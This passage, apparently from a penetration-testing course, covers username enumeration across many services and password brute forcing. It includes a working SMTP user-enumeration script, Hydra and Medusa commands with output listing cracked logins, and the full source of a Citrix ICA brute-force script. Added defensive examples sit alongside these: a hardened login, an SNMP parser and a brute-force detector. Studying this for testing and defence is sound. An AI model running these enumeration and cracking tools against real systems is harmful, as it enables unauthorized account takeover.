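        code = session.cmd(f"RCPT TO:<{user}>")[:3]
        session.cmd("RSET")
    else:
        code = session.cmd(f"{mode} {user}")[:3]
    if code == "250":
        return True
    if code in ("550", "551", "553"):
        return False
    return None        # 252 "cannot verify", 502 "not implemented", 500 ...


def enumerate_users(host, port, users, modes=("VRFY", "EXPN", "RCPT")):
    """Try each verb in turn; return (verb, existing_users) for the first one
    that discriminates, or (None, []) if the server gives nothing away."""
    for mode in modes:
        session, found, usable = SmtpSession(host, port), [], True
        try:
            for user in users:
                result = check_user(session, user, mode)
                if result is None:
                    usable = False
                    break
                if result:
                    found.append(user)
        finally:
            session.close()
        if usable:
            return mode, found
    return None, []
```

Against a real MTA, keep the query rate low and expect that a catch-all domain (every RCPT TO accepted) makes the third method useless too; in that case the only remaining signal is the NDR technique described next.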
Non Delivery Response (NDR)
Mail servers are helpful and try to give users the best service they can. Therefore, when
someone sends an email to a non-existent user, the mail server notifies the sender that the
user does not exist, so that he can correct a typing error or find out the person's new
account name.
To enumerate usernames using NDRs, the attacker simply sends an email to an account in the
target domain. If the account exists the attacker receives no notification; if it does not, a
non-delivery report comes back saying that the account does not exist.
POP3 Enumeration
The Post Office Protocol (POP3) is used by users to read their email. In order for a user
to get his mailbox contents, the server requires him to authenticate in two sequential
steps. In the first step the user sends the keyword "USER" followed by a space and his
username. In the second step the user sends the keyword "PASS" followed by a space
and his password in clear text.
Some POP3 servers are implemented in such a way that they reply with one error
message when the user exists and a different one when he does not. Select a list of
candidate usernames and passwords, connect to the POP3 server with a telnet client of your
choice and try to authenticate. The following is an example of a POP3 server listening on an
AS/400 machine:
Private User Directories
Apache User Enumeration
http://www.example.com/~<username>
When a remote user makes a request for a possible user's default home page, the
server returns one of three responses:
• In a case where username is a valid user account, and has been configured with a
homepage, the server responds with the user's homepage.
• When username exists on the system, but has not been assigned a homepage
document, the server returns the message "You don't have permission to access
/~username on this server."
• If the tested username does not exist as an account on the system, the Apache
server's response includes the message "The requested URL /~username was not
found on this server." or refers to the default error page configured for this error.
For example, when the user does not exist the server redirects to the website's main page:
WordPress Authors Template User Enumeration Vulnerability
There are other places where you might be able to find some usernames. A good
example is WordPress author templates which allow you to extract usernames through
URLs with the following syntax: /wordpress/author/authorname/
i.e.:
http://www.target-domain.com/wordpress/author/admin/
http://www.target-domain.com/wordpress/author/root/
A case when the user doesn’t exist:
A case when the user exists:
FTP
CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd)
The Sun Solaris operating system contains a built-in FTP server called "in.ftpd". This FTP
server has a classic user enumeration vulnerability. When a user is logged on to the
server, even with anonymous access, he can issue the CWD (Change Working Directory)
command followed by a tilde and a username.
The server replies with one response if the user account exists and a different one if it
does not. For example:
"CWD ~root"
FTP Server Authentication Delay Username Enumeration Vulnerability
(Example: ProFTPD)
A timing attack exists in ProFTPD that can assist a remote user in enumerating
usernames. Analysing the response time during authentication tells an attacker
whether or not the supplied username is valid.
The problem occurs because the daemon takes different execution paths when it encounters a
valid, invalid or privileged username. A remote attacker can exploit this to determine which
usernames are valid, privileged, or do not exist on the remote system.
When an authentication attempt is sent to the FTP server, it responds slowly if the
username exists and faster if it does not.
Telnet
Telnet Server User Field Account Enumeration (Example: Cisco Aironet)
A flaw was discovered in the firmware (version 12.2) of the Cisco Aironet AP1100. The
flaw allows a malicious remote user to discover which accounts are valid on the targeted
Cisco Aironet access point by submitting a username as the first parameter.
If the account exists, the attacker is then prompted for the password.
If not, the server replies with the message "% Login invalid", revealing that the account
does not exist.
Web Server Pre-Login HTTP Response Based Enumeration (Example:
Lotus Domino)
An issue was reported in Lotus Domino server (“Lotus Domino Username Enumeration
Vulnerability”), which could allow for remote users to determine the validity of a
username existing on a host.
When a remote user submits a GET request for a possible user's account, the server
response assists the user in determining the validity of the username submitted. If the
submitted username is valid, the server replies with an HTTP 200 OK message and the
login screen.
Alternatively, when the submitted username is not valid (meaning that it does not exist
on the system), the server responds with a 404 File not Found message. Because the
server responds differently depending on whether or not the username is valid, an
attacker user can test and enumerate possible usernames.
Error Message User Enumeration:
Most systems developed in the last decade are web applications. Most of these applications
require a login mechanism, which is usually developed by the companies themselves. As
secure development is rarely taught in common Computer Science and Software Engineering
degrees, many developers make the same mistakes when developing login mechanisms.
The most common mistake is the application replying with one error message when the user
account exists and a different one when it does not, which lets an attacker confirm valid
usernames. For example:
• System Registration Error Message User Enumeration
o Sorry, there is already an account registered with the same email address.
• System Login Error Message User Enumeration
o Authentication failure: entered username does not exist.
o Authentication failure: incorrect password entered.
• System “Forget Password” Error/Success Message User Enumeration
o Sorry, the email address entered does not exist.
o A new password has been sent to your email address.
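The vulnerable login beside a hardened one, as an added example that is not part of the original document (the user store, the messages and the PBKDF2 parameters are assumptions). The hardened version returns a single generic message and does the same password-hashing work whether or not the account exists, which also closes the timing channel of the kind described for ProFTPD above; the registration and password-reset helpers apply the same idea to the other two messages listed.

```python
import hashlib
import hmac
import os
import secrets


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


# Constructed user store for the example; a real system would use its database.
_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _hash("correct horse", _SALT))}
ACCOUNT_EMAILS = {"alice@example.test"}
# A throw-away credential hashed at start-up so that unknown users cost
# exactly the same work (and time) as known ones.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash(secrets.token_hex(16), _DUMMY_SALT)


def login_vulnerable(username, password):
    """Leaks account existence twice: through two distinct messages and
    through timing, since an unknown user returns before any hashing."""
    if username not in USERS:
        return False, "Authentication failure: entered username does not exist."
    salt, stored = USERS[username]
    if _hash(password, salt) != stored:
        return False, "Authentication failure: incorrect password entered."
    return True, "Welcome."


GENERIC = "Invalid username or password."


def login_hardened(username, password):
    """One message and one amount of work whether or not the user exists."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    match = hmac.compare_digest(_hash(password, salt), stored)   # always runs
    if match and username in USERS:
        return True, "Welcome."
    return False, GENERIC


def register_hardened(email, send_mail):
    """The page says the same thing in both cases; the difference goes by mail."""
    if email in ACCOUNT_EMAILS:
        send_mail(email, "You already have an account; use password reset.")
    else:
        send_mail(email, "Confirm your new account.")
    return "Check your e-mail to continue."


def forgot_password_hardened(email, send_reset_mail):
    """Same response either way; the reset mail is only sent if the account exists."""
    if email in ACCOUNT_EMAILS:
        send_reset_mail(email)
    return "If that address is registered, a reset link has been sent to it."
```

Equal messages are necessary but not sufficient: the response must also be the same size and status code, and the endpoints still need rate limiting, because a generic message does nothing against an attacker who can try thousands of names per minute.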
NetBIOS User Enumeration
The LSA (Local Security Authority) service on every Windows machine handles user logon and
determines the access level each user gets to system objects when connecting to system
services such as RPC, WMI, Remote Desktop and NetBIOS.
On Windows Server 2003 and earlier, the "RestrictAnonymous" setting is configured by
default to allow unauthenticated users to retrieve information about any/all local/domain
users (RestrictAnonymous=0). This setting allows an attacker to connect to the server with an
empty username and password (a "null session").
For example, by running: net use \\domain_server\IPC$ "" /user:"" or by using the common
NetBIOS user enumeration tool written by SecurityFriday, "GetAcct":
It is also possible to use the tool Winfingerprint to obtain information from all common
services exposed by a server on the local network:
GFI LANguard
SNMP Enumeration
It is possible to obtain system information about a remote host by sending SNMP requests
for an OID (Object Identifier) that exists on it, such as 1.3.6.1.2.1.1.1 (sysDescr). An attacker
may use this information to gain more knowledge about the target host.
An attacker can remotely discover the machine's usernames, the IPs connected to the machine,
MAC addresses, internal IPs, gateways and DNS servers (which help in mapping and taking over
the internal network). The attacker also learns the exact model and firmware version of the
machine and can use them to build a reliable exploit.
An Example of a remote SNMP Enumeration:
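An SNMPv1 GetRequest for sysDescr.0 built and decoded by hand, as an added example that is not part of the original document (the original's screenshot is not reproduced here). It shows what the request looks like on the wire and how an agent's reply is parsed; the sample GetResponse is constructed by the example itself, and only snmp_get() needs a reachable agent.

```python
import random
import socket

# Minimal BER/SNMPv1 codec written for this example (not the page's own
# tooling): builds a GetRequest for sysDescr.0 and decodes the GetResponse.


def ber_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def encode_int(v):
    # two's-complement INTEGER, minimal length (v >= 0 here, so a leading
    # zero byte is added when the top bit would otherwise be set)
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))


def encode_oid(oid):
    parts = [int(x) for x in oid.strip(".").split(".")]
    out = [parts[0] * 40 + parts[1]]
    for p in parts[2:]:                     # base-128, high bit = more follows
        chunk = [p & 0x7F]
        p >>= 7
        while p:
            chunk.append(0x80 | (p & 0x7F))
            p >>= 7
        out += reversed(chunk)
    return tlv(0x06, bytes(out))


def build_get_request(community, oid, request_id):
    varbind = tlv(0x30, encode_oid(oid) + tlv(0x05, b""))          # value NULL
    pdu = tlv(0xA0, encode_int(request_id) + encode_int(0)         # error-status
              + encode_int(0) + tlv(0x30, varbind))                # error-index
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)


def build_get_response(community, request_id, oid, text):
    """Constructed sample reply, shaped like a real agent's GetResponse."""
    varbind = tlv(0x30, encode_oid(oid) + tlv(0x04, text.encode()))
    pdu = tlv(0xA2, encode_int(request_id) + encode_int(0)
              + encode_int(0) + tlv(0x30, varbind))
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)


def ber_parse(buf, pos=0):
    """One TLV at pos -> (tag, value_bytes, next_pos); handles long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def ber_children(payload):
    items, pos = [], 0
    while pos < len(payload):
        tag, val, pos = ber_parse(payload, pos)
        items.append((tag, val))
    return items


def decode_oid(b):
    parts, v = [b[0] // 40, b[0] % 40], 0
    for x in b[1:]:
        v = (v << 7) | (x & 0x7F)
        if not x & 0x80:
            parts.append(v)
            v = 0
    return ".".join(map(str, parts))


def parse_get_response(data):
    """-> (request_id, error_status, [(oid, value)])."""
    _, msg, _ = ber_parse(data)
    _version, _community, (pdu_tag, pdu) = ber_children(msg)
    if pdu_tag != 0xA2:
        raise ValueError("not a GetResponse PDU")
    (_, rid), (_, err), _idx, (_, varbinds) = ber_children(pdu)
    results = []
    for _, vb in ber_children(varbinds):
        (_, oid), (vtag, val) = ber_children(vb)
        if vtag == 0x04:
            value = val.decode("latin-1")
        elif vtag == 0x02:
            value = int.from_bytes(val, "big", signed=True)
        elif vtag == 0x06:
            value = decode_oid(val)
        else:
            value = val                      # leave other types raw
        results.append((decode_oid(oid), value))
    return (int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big", signed=True), results)


def snmp_get(host, community="public", oid="1.3.6.1.2.1.1.1.0",
             port=161, timeout=3.0):
    """Live GET over UDP (needs a reachable agent; not used by the offline test)."""
    rid = random.randrange(1, 2**31)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community, oid, rid), (host, port))
        data, _ = s.recvfrom(65535)
    got_rid, err, results = parse_get_response(data)
    if got_rid != rid:
        raise ValueError("request-id mismatch: reply is not ours")
    return err, results
```

The request-id check matters because SNMP runs over UDP: without it a spoofed or stale datagram is accepted as the answer. A full walk (GetNext from 1.3.6.1.2.1 onwards) is the same encoding with PDU tag 0xA1 and the last returned OID as the next argument.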
DNS Enumeration
A penetration test project begins with collecting information and mapping all of the
organization's remotely accessible servers. The Domain Name System can be used to extract
some of the existing subdomains and discover more IPs with different server types, from web
servers to firewalls, VPNs and Citrix servers.
DNS subdomains can be enumerated using a dictionary of common subdomain names such as
"mail", "webmail", "vpn", "backoffice", "fw", etc.
To find customized subdomain names, an attacker must run a full remote brute-force attack,
which is likely to disclose all subdomain names of up to a few characters in length made of
letters and digits (the search space grows 36-fold per character, so 8-character labels are
beyond what can be tried exhaustively). Since DNS is UDP based, the brute-force attack is
faster than most other network brute-force attacks. Wildcard DNS, where any name resolves,
must be detected first or every guess will look like a hit.
Dictionary Based DNS Enumeration
Brute Forcing DNS Sub-Domains
VoIP User Enumeration
Most currently deployed VoIP servers use SIP (Session Initiation Protocol) server
implementations, which are very similar to HTTP. In order to authenticate using the SIP
protocol, the remote user must specify the extension to log into. Then the user is
required to submit a username and password, where in most cases the extension
number is also the username.
Several VoIP systems start the first extension number at 100 and set the default
password of every extension to the extension number. This means that for some VoIP
servers, the default usernames and passwords will be 100:100, 101:101, etc.
Enumerating Extensions:
Enumerating Usernames (example: Inter-Asterisk eXchange protocol):
Citrix Published Applications Remote Enumeration
It is possible to use several tools, such as:
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-scan.c
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-proxy.pl
The Citrix Application Enumeration script can be used as follows:
# ./citrix-pa-scan 212.123.69.1
Citrix Published Application Scanner version 1.0 By Ian Vitek, ian.vitek@ixsecurity.com
212.123.69.1: Found Applications:
Printer Config
Admin Desktop
i-desktop
It is also possible to use Nmap or Metasploit to enumerate the applications published by a
Citrix server:
$ msfconsole
msf > use auxiliary/gather/citrix_published_bruteforce
msf auxiliary(citrix_published_bruteforce) > set RHOST [TARGET IP]
msf auxiliary(citrix_published_bruteforce) > run
Once found, an application can be manually added to the local ICA client:
System Hacking Part 1 – Cracking Passwords
Brute Forcing Passwords – Telnet:
Cracking Accounts Using Hydra
Using the tool Hydra by THC (The Hacker's Choice), it is possible to remotely and reliably crack
accounts on almost every commonly used system.
Hydra supports cracking accounts over all of the following protocols: imap, imap-ntlm, smb, smbnt,
http/https-{head|get|post|post-form}, http-proxy, cisco (telnet), cisco-enable (telnet), vnc,
ldap2, ldap3, mssql, mysql, oracle-listener, postgres, nntp, socks5, rexec, rlogin, pcnfs, snmp,
rsh, cvs, svn, icq, sapr3, ssh2, smtp-auth, smtp-auth-ntlm, pcanywhere, teamspeak, sip, vmauthd.
hydra.exe -L "usernames.txt" -P "passwords.txt" -e ns -o cracked_smbs.txt <any_domain_connected_machine> smb
Example:
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-11-07 17:16:06
[DATA] 1 tasks, 1 servers, 4652972 login tries (l: 11026/p: 422), ~4652972 tries per task
[DATA] attacking service smb on port 139
[STATUS] 8332.00 tries/min, 8332 tries in 00:01h, 4644640 to do in 09:18h
[STATUS] 7643.33 tries/min, 22930 tries in 00:03h, 4630042 to do in 10:06h
[STATUS] 7530.43 tries/min, 52713 tries in 00:07h, 4600259 to do in 10:11h
[139][smb] host: 10.205.200.206 login: PRAVNER password: 12345
[139][smb] host: 10.205.200.206 login: ZORIK password: 12345
[139][smb] host: 10.205.200.206 login: COHSIGAL password: 123456
[139][smb] host: 10.205.200.206 login: INADRIAN password: 123456
[139][smb] host: 10.205.200.206 login: Guest password: Guest
[139][smb] host: 10.205.200.206 login: MLSHOSHANA password: 12345
[139][smb] host: 10.205.200.206 login: MEETING_ROOM password: 12345
[STATUS] 7803.07 tries/min, 117046 tries in 00:15h, 4535926 to do in 09:42h
[139][smb] host: 10.205.200.206 login: SHIL password: 22222
[139][smb] host: 10.205.200.206 login: NTRFAX password: NTRFAX
[139][smb] host: 10.205.200.206 login: EZORLY password: 22222
[139][smb] host: 10.205.200.206 login: anonymous password: anonymous
[139][smb] host: 10.205.200.206 login: INFO password: 12345
[139][smb] host: 10.205.200.206 login: NTJERPDC password: NTJERPDC
[STATUS] 8046.32 tries/min, 249436 tries in 00:31h, 4403536 to do in 09:08h
[139][smb] host: 10.205.200.206 login: GRMINA password: 123456
[139][smb] host: 10.205.200.206 login: BRSHUKI password: 123456
[139][smb] host: 10.205.200.206 login: KZADINA password: 123456
[139][smb] host: 10.205.200.206 login: SPOFER password: 123456
[STATUS] 8254.85 tries/min, 387978 tries in 00:47h, 4264994 to do in 08:37h
[139][smb] host: 10.205.200.206 login: ALROZE password: 123456
[139][smb] host: 10.205.200.206 login: CHYULI password: 12345
Cracking Accounts Using Medusa:
Medusa is very much like Hydra; it supports the following protocols: AFP, CVS, FTP,
HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL,
REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN),
Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form.
Here is an example of usage and results:
% medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt
Medusa v1.0-rc1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: (1/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass2 (5/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass3 (6/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass4 (7/7)
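Seen from the server, the Hydra and Medusa runs above are the same event: one source working through a list of logins against a single host at thousands of tries per minute. The following Python is an added detection example, not part of the page or of either tool; the log record layout, hosts, addresses and logins are constructed, and the thresholds are assumptions to be tuned per environment.

```python
"""Brute-force and password-spray detection over authentication-failure records.

Added example, not from the page or from Hydra/Medusa: the record layout is a
constructed syslog-like format, and every host, address and login is sample data.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed layout: "<YYYY-MM-DD HH:MM:SS> auth host=<target> src=<ip> user=<login> result=<ok|fail>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) auth "
    r"host=(?P<host>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse_line(line):
    """Return the fields of one record as a dict, or None for a line that does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    return rec


def detect_bruteforce(lines, window=timedelta(minutes=1), max_fails=20, max_users=5):
    """Flag each (src, host) pair that exceeds max_fails failures inside any sliding
    window of the given length (rapid guessing, as in the STATUS lines above), or that
    fails against more than max_users distinct logins (a whole user list against one host).
    Returns {(src, host): [reason, ...]} for flagged pairs only."""
    fails = defaultdict(list)   # (src, host) -> timestamps of failed attempts
    users = defaultdict(set)    # (src, host) -> distinct logins that failed
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["result"] != "fail":
            continue
        key = (rec["src"], rec["host"])
        fails[key].append(rec["ts"])
        users[key].add(rec["user"])

    alerts = {}
    for key, stamps in fails.items():
        reasons = []
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window's left edge forward
                start += 1
            if end - start + 1 > max_fails:
                reasons.append(f"{end - start + 1} failures within {window}")
                break
        if len(users[key]) > max_users:
            reasons.append(f"{len(users[key])} distinct logins tried")
        if reasons:
            alerts[key] = reasons
    return alerts


def constructed_log():
    """Constructed sample: one source cycling through eight logins at one failure per
    second against 'fileserver01', next to a real user who mistypes twice and logs in."""
    base = datetime(2010, 11, 7, 17, 16, 0)
    fmt = "{} auth host=fileserver01 src={} user={} result={}"
    logins = ["guest", "info", "ntrfax", "meeting_room", "shil", "ezorly", "grmina", "alroze"]
    lines = [fmt.format(base + timedelta(seconds=n), "10.0.0.9", logins[n % 8], "fail")
             for n in range(30)]
    lines += [fmt.format(base + timedelta(seconds=5), "10.0.0.7", "jdoe", "fail"),
              fmt.format(base + timedelta(seconds=9), "10.0.0.7", "jdoe", "fail"),
              fmt.format(base + timedelta(seconds=14), "10.0.0.7", "jdoe", "ok")]
    return lines


if __name__ == "__main__":
    for (src, host), why in detect_bruteforce(constructed_log()).items():
        print(f"ALERT {src} -> {host}: {'; '.join(why)}")
```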
Brute Forcing Check Point Client Authentication Remote Service
The Check Point web Client Authentication Remote Service is just a simple HTML-based
authentication form, easily attacked with a common web brute force tool such as Hydra,
Medusa, Crowbar, etc.
The login page was shown in the enumeration section. The result of a successful login
attempt with a default user on a Check Point firewall looks like this:
Brute Forcing Citrix ICA Servers
The hacker pdp from GNUCITIZEN.org wrote a Citrix brute force tool (I guess this was the first
public one and for now it seems to be the only one) which uses the “Citrix.ICAClient” COM object
to drive the local Citrix client to make the login attempts. The code is local JavaScript code
running under “Windows Script Host”.
// Citrix login brute-force utility by pdp (GNUCITIZEN), run under Windows Script Host.
// Arguments are key=value pairs; keys that are not options are passed to the ICA client as properties.
var actns = [];        // queue of pending actions (connect / disconnect closures)
var pairs = [];        // every username/password combination to try
var parms = {};        // ICA client properties given on the command line
var util = this;       // the global object; per-attempt client objects are stored on it
var usernames = [];
var passwords = [];
var timeout = 5000;    // milliseconds to wait between actions

if (WScript.Arguments.length < 3) {
    WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
    WScript.Echo(' ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2');
    WScript.Echo(' ' + WScript.ScriptName + ' HTTPBrowserAddress=172.16.3.191 userfile=file.txt passfile=file.txt');
    WScript.Echo(' ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2 timeout=5000');
    WScript.Echo('');
    WScript.Echo('CITRIX Login Bruteforce Utility');
    WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
    WScript.Quit(1);
}

// A throw-away client used only to validate the client properties given on the command line
var try_out = WScript.CreateObject('Citrix.ICAClient');
for (var i = 0; i < WScript.Arguments.length; i++) {
    var arg = WScript.Arguments(i);
    var tkn = arg.split('=');
    try {
        var name = tkn[0].replace(/^\s+|\s+$/g, '');
        var value = tkn[1].replace(/^\s+|\s+$/g, '');
        switch (name) {
            case 'timeout':
                timeout = parseInt(value, 10);
                if (isNaN(timeout)) {
                    // keep the default when the value is not numeric
                    WScript.Echo("option 'timeout' must be an integer value");
                    timeout = 5000;
                }
                break;
            case 'usernames':
                var items = value.split(',');
                for (var z = 0; z < items.length; z++) {
                    usernames.push(items[z].replace(/^\s+|\s+$/g, ''));
                }
                break;
            case 'passwords':
                var items = value.split(',');
                for (var z = 0; z < items.length; z++) {
                    passwords.push(items[z].replace(/^\s+|\s+$/g, ''));
                }
                break;
            case 'userfile':
                try {
                    var fso = WScript.CreateObject('Scripting.FileSystemObject');
                    var f = fso.OpenTextFile(value, 1);   // 1 = ForReading
                    while (!f.AtEndOfStream) {
                        var line = f.ReadLine();
                        usernames.push(line.replace(/^\s+|\s+$/g, ''));
                    }
                    f.Close();
                } catch (e) {
                    WScript.Echo(e.message);
                    WScript.Quit(1);
                }
                break;
            case 'passfile':
                try {
                    var fso = WScript.CreateObject('Scripting.FileSystemObject');
                    var f = fso.OpenTextFile(value, 1);   // 1 = ForReading
                    while (!f.AtEndOfStream) {
                        var line = f.ReadLine();
                        passwords.push(line.replace(/^\s+|\s+$/g, ''));
                    }
                    f.Close();
                } catch (e) {
                    WScript.Echo(e.message);
                    WScript.Quit(1);
                }
                break;
            default:
                // anything else is treated as an ICA client property (e.g. TCPBrowserAddress)
                try_out.SetProp(name, value);
                parms[name] = value;
        }
    } catch (e) {
        WScript.Echo("option '" + arg + "' not recognized");
        WScript.Quit(1);
    }
}

// frap(f, a, b, ...) returns a closure that calls f(a, b, ...) when invoked later
function frap(f) {
    var a = [];
    for (var i = 1; i < arguments.length; i++) {
        a.push(arguments[i]);
    }
    return function () {
        f.apply(f, a);
    };
}

// build the full cross product of usernames and passwords
for (var i = 0; i < usernames.length; i++) {
    for (var z = 0; z < passwords.length; z++) {
        pairs.push([usernames[i], passwords[z]]);
    }
}

// one connect action per pair; each connect action also queues its own disconnect
for (var i = 0; i < pairs.length; i++) {
    actns.push(frap(function (i) {
        // the second CreateObject argument registers '_ica<i>' as the event prefix,
        // so util['_ica<i>OnLogon'] is called by the client when the logon succeeds
        util['_cls' + i] = WScript.CreateObject('Citrix.ICAClient', '_ica' + i);
        util['_ica' + i + 'OnLogon'] = frap(function (i) {
            WScript.Echo(pairs[i]);   // a working pair is printed as "user,password"
            util['_cls' + i].Disconnect();
        }, i);
        for (var z in parms) {
            util['_cls' + i].SetProp(z, parms[z]);
        }
        util['_cls' + i].SetProp('UserName', pairs[i][0]);
        util['_cls' + i].SetProp('Password', pairs[i][1]);
        util['_cls' + i].SetProp('Launch', 'TRUE');
        util['_cls' + i].Connect();
        actns.push(frap(function (i) {
            util['_cls' + i].Disconnect();
        }, i));
    }, i));
}

// drain the action queue, sleeping between actions so the client has time to log on
while (1) {
    var action = actns.pop();
    if (action) {
        action();
    } else {
        WScript.Quit(0);
    }
    WScript.Sleep(timeout);
}
pdp also wrote a script that uses the Citrix client in the normal way, once a username and password have been obtained:
// Citrix client utility by pdp (GNUCITIZEN): every key=value argument becomes an ICA client property
var client = WScript.CreateObject('Citrix.ICAClient');
if (WScript.Arguments.length == 0) {
    WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
    WScript.Echo(' ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 Application=Notepad');
    WScript.Echo('');
    WScript.Echo('CITRIX Client Utility');
    WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
    WScript.Quit(1);
} else {
    for (var i = 0; i < WScript.Arguments.length; i++) {
        var arg = WScript.Arguments(i);
        var tkn = arg.split('=');
        try {
            var name = tkn[0].replace(/^\s+|\s+$/g, '');
            var value = tkn[1].replace(/^\s+|\s+$/g, '');
            client[name] = value;   // set the property directly on the COM object
        } catch (e) {
            WScript.Echo("option '" + arg + "' not recognized");
            WScript.Quit(1);
        }
    }
}
try {
    client.Launch = "TRUE";
    client.Connect();
} catch (e) {
    WScript.Echo(e.message);
}
Trojans' and Backdoors' Effect on Business
In this section we will cover the most common malware in the world: what it does, how it works
and how it affects the world's computer industry and the economy. The types of malware to be
covered:
Dialers
FraudWare
Keyloggers
Spyware & Browser Trojans
Trojans
Password Stealers
RansomWare
Network Shares/Local Replicating Viruses
Worms
The following is according to research done by the Ponemon Institute:
We see that cybercrime damage costs 45 companies about 52 billion dollars every year.
Here we can see that 80% of attacks result in a Trojan, backdoor, worm or virus being installed.
Auto Dialers
Mutes the modem's speaker
Automatically calls 1-900 numbers on your behalf
You are charged between $1 and $20 or more per minute
At the end of the month the bill usually totals more than $5000
Anti-viruses don't supply a generic way to stop these viruses; the only generic defense is not
to let any software create and dial connections.
FraudWare
A fake “Anti-Spyware” or “Anti-Virus” product
Has a GUI that looks the same as a genuine AV
Installs some applications on your computer to scare you, for example a red desktop
background with a pirate skull and a popup saying “Virus found, pay to purchase a license
and remove it”
Known signatures in AVs treat it as “Not.a.virus.fraudware” and do nothing
It may self-update into a real, unknown virus
Keylogger
Divided into 2 types:
▪ User mode
▪ SetWindowsHookEx
▪ GetAsyncKeyState
▪ Code example: http://www.rootkit.com/newsread.php?newsid=346
▪ Uncaught example: a keylogger running under Kaspersky 2009
▪ Kernel mode
▪ A driver sitting as low in the stack as the physical keyboard interface
▪ Most of them are undetectable and, once run, can shut down and delete
any anti-virus
▪ Code example:
http://www.woodmann.com/forum/attachment.php?attachmentid=1084&d=1093991813
▪ 99% uncaught
How can we differentiate between a keylogger and a computer game?
Spyware & Browser Trojans
Integrates itself into your browser
Tracks browsing/buying preferences
Steals account passwords
Bypasses firewalls, as it injects “image requests” into active, user-initiated
connections to “safe websites”
Caught based on signatures and URL blacklists, which are modified every day
Trojans
Integrates itself into your system to stealthily run on each boot
Opens a shell or connects back to the attacker for a live session or to retrieve
“commands”
Some are integrated with a password stealer and a keylogger
A famous Trojan is “SubSeven”
Easy to write, hard to “detect”, as it does the same actions legitimate software does (e.g.
Skype)
Password Stealers
Most run once and “suicide”; others may integrate themselves into
your system to stealthily run on each boot
Some also have an integrated keylogger
Steal passwords saved by clients and typed into clients at runtime (e.g. dialup, email, IE,
MSN, YMSN, ICQ/AOL, Oracle, FTP passwords)
A famous Russian password stealer: “Pinch!”
Easy to write, almost impossible to detect as malicious: “it just reads local non-
document files and a few non-system registry entries”, “perhaps it's a password
manager?”
RansomWare
RansomWare typically propagates as a conventional computer worm, entering a system
through, for example, a vulnerability in a network service or an e-mail attachment. It may then:
Disable an essential system service or lock the display at system startup.
Encrypt some of the user's personal files. Encrypting RansomWare was
originally referred to as crypto-viruses, crypto-Trojans or crypto-worms.
In both cases, the malware may extort by:
Prompting the user to enter a code obtainable only after wiring payment to the attacker
or sending an SMS message and accruing a charge.
Urging the user to buy a decryption or removal tool.
More sophisticated RansomWare may hybrid-encrypt the victim's plaintext with a
random symmetric key and a fixed public key. The malware author is the only party that knows
the needed private decryption key. The author who carries out this crypto-viral extortion attack
offers to recover the symmetric key for a fee.
A famous example: “Gpcode”, which used RSA 1024-bit encryption; Kaspersky Anti-Virus labs
requested help from the community, needing 15 million computers running for
about a year, to crack one variant's key.
How can such software be detected?! This is an everlasting logical vulnerability. It just
